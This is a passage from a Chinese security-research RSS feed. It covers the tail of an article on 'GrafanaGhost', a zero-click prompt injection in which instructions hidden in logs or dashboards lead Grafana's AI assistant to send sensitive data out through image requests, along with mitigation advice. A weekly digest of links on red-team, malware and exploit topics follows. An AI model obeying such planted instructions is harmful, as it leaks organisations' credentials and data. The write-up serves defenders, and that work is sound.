class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">零点击静默触发：</span></strong><span leaf="">相较于传统社会工程学攻击，GrafanaGhost 彻底摆脱了对用户交互行为的依赖。只要管理员或系统例行调用 AI 助手分析包含恶意载荷的面板、日志或告警条目，攻击逻辑即刻在后台静默触发，利用成本极低。</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">核心监控资产失陷：</span></strong><span leaf="">Grafana 承担着企业统一观测平台与运维数据集成节点的职能，后端深度关联着业务核心指标、基础架构拓扑及各类 API 凭证。漏洞允许攻击者绕过鉴权逻辑，精准提取这些维系业务运行的高价值敏感资产。</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">高度隐蔽性与持续驻留：</span></strong><span leaf="">由于注入指令潜伏在正常的业务日志或外部遥测数据流中，且数据外泄行为高度混淆于常规的静态图片加载请求内，现有的 WAF 过滤规则与 SOC 审计逻辑极难有效识别并拦截此类带外（OOB）攻击行为。</span></p></li></ul><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">05 缓解措施建议与企业等级防御建议</span></span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在AI业务大规模落地的背景下，针对AI智能体应用侧安全，建议采取以下手段：</span></p><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">明确数据与边界指令（数据构造）：</span></strong><span leaf="">在LLM处理外部非置信日志之前，增加专门的清理（清理）层，或强制采用数据格式（如JSON）传递上下文，分割文本中的指令性语气。</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">收敛AI工具调用权限（最小权限原则）：</span></strong><span leaf="">严格限制AI助手对核心数据库的直接访问权限。对于涉及数据导出的敏感API，必须引入强制的人工中间环节（HITL）。</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">封堵带外（OOB）外传通道：</span></strong><span leaf="">在接入渲染层实施严格的内容安全策略（CSP），禁止加载未授权的外部域资源；在网络层对可落地平台的出站流量（Egress）进行白管名单控制。</span></p></li></ol><div style="color: rgb(160, 160, 160);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">目前，AISS安全智链社区已收录百余条案例，包含多个AI安全风险，感兴趣的读者可前往<a href="https://aiss.nsfocus.com/#/ai-cases查看更多人工智能安全相关案例分析与最新研究。" target="_blank">https://aiss.nsfocus.com/#/ai-cases查看更多人工智能安全相关案例分析与最新研究。</a></span></em></p></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GrafanaGhost再次案例证明，AI智能体在提升运维效率的同时，也成为了数据泄露的新通道。在落地平台这种高度集成敏感数据的场景下，开发者必须重新利用AI与不可信数据之间的信任边界，避免AI沦为“幽灵”数据窃取者。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">原文链接：<a href="https://noma.security/blog/grafana-ghost/" target="_blank">https://noma.security/blog/grafana-ghost/</a></span></p></div><div style="margin: 54px 0% 10px;text-align: center;justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 95%;vertical-align: top;border-style: solid;border-width: 2px;border-color: rgb(67, 146, 117);padding: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 11px;margin: -44px 0% 0px;box-sizing: border-box;"><div style="width: 7em;height: 7em;display: inline-block;vertical-align: middle;border-radius: 100%;background-color: rgb(255, 255, 255);margin: 0px -2.18em 0px -2.2em;box-sizing: border-box;"><div data-cacheurl="" data-remoteid="" style="width: 6em;height: 6em;margin: 0.5em auto;border-radius: 100%;background-position: 50.9993% 50%;background-repeat: no-repeat;background-size: 170.274%;border-width: 3px;border-style: solid;border-color: rgb(255, 255, 255);overflow: hidden;box-sizing: border-box;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=da4044f2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCl4oftFVbbb5y8WEsJYMYvOYeU9HnIHN86MPBrSCs1evVnDSLs4S5yl2lvRUms4U8w16MzcduPzRv9KNF8kXpI9PogfBbCYCXE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><p style="width: 100%;height: 100%;overflow: hidden;line-height: 0;max-width: 100%;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9722222" data-s="300,640" data-type="png" data-w="1080" style="width: 100%;height: 100%;opacity: 0;box-sizing: border-box;" data-imgfileid="100011291" src="https://wechat2rss.xlab.app/img-proxy/?k=d299ff3f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jClh1wL0m23A49SO1856VgHEvbNDFaSlOnsPDmmeWUicDNAYTHGWC4JFyGqMmibVWQPRiaA38czIrgpglWkZa7T9eMRYibo03ZbVribE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div><div style="justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 10px 10px 20px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.8;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">绿盟科技天元实验室</span></strong><span leaf="">专注于新型实战化攻防对抗技术研究。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究目标包括：漏洞利用技术、防御绕过技术、攻击隐匿技术、攻击持久化技术等蓝军技术，以及攻击技战术、攻击框架的研究。涵盖Web安全、终端安全、AD安全、云安全等多个技术领域的攻击技术研究，以及工业互联网、车联网等业务场景的攻击技术研究。通过研究攻击对抗技术，从攻击视角提供识别风险的方法和手段，为威胁对抗提供决策支撑。</span></p></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011288" src="https://wechat2rss.xlab.app/img-proxy/?k=06173e48&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCnVox6W52pYvXT5I8icJQuuJC0I1jgxzrAeQz8sbnrc9QUVbzkFb4Bu0Sthia8ECCU6rrAlObnebnC5GvN234aicNJLzOw2fAG9EA%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9145907" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011290" src="https://wechat2rss.xlab.app/img-proxy/?k=495983d9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCluIqmOA0hxmHqUEsT4CK2h6nYWaK4Okiad8xFwMrJMJHCBFiaKq1vicQia2olQhoOgTibtwGgbc9mPFtOBul8azicDKvMmYLQUVibky4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=06c26c49&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494946%26idx%3D1%26sn%3Dcfb436b16c06bf1e2fda6abfc1d7a050">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 13 Apr 2026 18:00:00 +0800</pubDate>
    </item>
    <item>
      <title>每周蓝军技术推送（2026.4.4-2026.4.10）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494935&amp;idx=1&amp;sn=2087d14d42eb91ff972139ef7fefc5d5</link>
      <description>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-04-10 18:00</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=a972b10c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FTPGibEO8KBwbD5z6C0g2NAp2OicEl3fdbRrPUY2MuWIcreXMC0tGBdfWBviaqDPPyN63iawoWIujD6l1Fx5keMUib4w%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100011285" data-ratio="0.4222222" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=7e0bae8b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCkickNLlacmH5o0psfGK1MVLoQ4GBFKWN1MTHZgO7ichEQql5AAsicaH68Bia0QJwftcsr0sJF41lz0ua7S0Yy89JmXfNmt8Y2VPe0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">内网渗透</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">使用mitmproxy设置透明代理环境，包括Linux网络命名空间、WiFi AP创建和Android系统证书安装</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.synacktiv.com/en/publications/mitmproxy-for-fun-and-profit-interception-and-analysis-of-application-traffic" target="_blank">https://www.synacktiv.com/en/publications/mitmproxy-for-fun-and-profit-interception-and-analysis-of-application-traffic</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Making CloudFlare Workers Work for Red Teams：利用CloudFlare Workers进行红队操作，包括多轮攻击、载荷轮换及检测对抗技术</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.zsec.uk/capd" target="_blank">https://blog.zsec.uk/capd</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">发布 supabase-exposure-check 脚本，扫描网站暴露的 Supabase JWT 令牌并枚举可访问数据库表</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://bour.ch/how-rep-helped-me-identify-a-critical-supabase-jwt-exposure" target="_blank">https://bour.ch/how-rep-helped-me-identify-a-critical-supabase-jwt-exposure</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OWASP Top 10 2025版更新，基于280万应用数据，SSRF归入访问控制类</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://owasp.org/Top10/2025/0x00_2025-Introduction" target="_blank">https://owasp.org/Top10/2025/0x00_2025-Introduction</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">终端对抗</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">FancyBear开发模块化多平台利用工具包，受害者仅打开恶意邮件即可窃取凭证、绕过2FA、外传邮件并建立持久转发规则</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://ctrlaltintel.com/threat%20research/FancyBear" target="_blank">https://ctrlaltintel.com/threat%20research/FancyBear</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">How Kernel Rootkits Blind Observability Tools：攻击者控制内核后，可操纵eBPF工具依赖的内核到用户空间数据传递机制，使安全监控失效</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://matheuzsecurity.github.io/hacking/ebpf-security-tools-hacking" target="_blank">https://matheuzsecurity.github.io/hacking/ebpf-security-tools-hacking</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">威胁组织扩大滥用Visual Studio Code，载荷包含AI辅助生成的代码特征</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.jamf.com/blog/threat-actors-expand-abuse-of-visual-studio-code" target="_blank">https://www.jamf.com/blog/threat-actors-expand-abuse-of-visual-studio-code</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GachiLoader 变种使用&#34;Vectored Overloading&#34;技术，欺骗Windows加载器从内存加载恶意PE而非合法DLL</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://research.checkpoint.com/2025/gachiloader-node-js-malware-with-api-tracing" target="_blank">https://research.checkpoint.com/2025/gachiloader-node-js-malware-with-api-tracing</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Keeping Secrets Out of Logs：防止密钥泄露到日志的整体策略，包括建立明确预期、理解数据流、保护关键点、实施纵深防御和规划应急响应</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://allan.reyes.sh/posts/keeping-secrets-out-of-logs" target="_blank">https://allan.reyes.sh/posts/keeping-secrets-out-of-logs</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">MMC MSC EvilTwin 本地提权漏洞，利用恶意 .msc 文件执行任意代码，影响 Win10/11/Server 2016-2025</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52498" target="_blank">https://www.exploit-db.com/exploits/52498</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">漏洞相关</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: 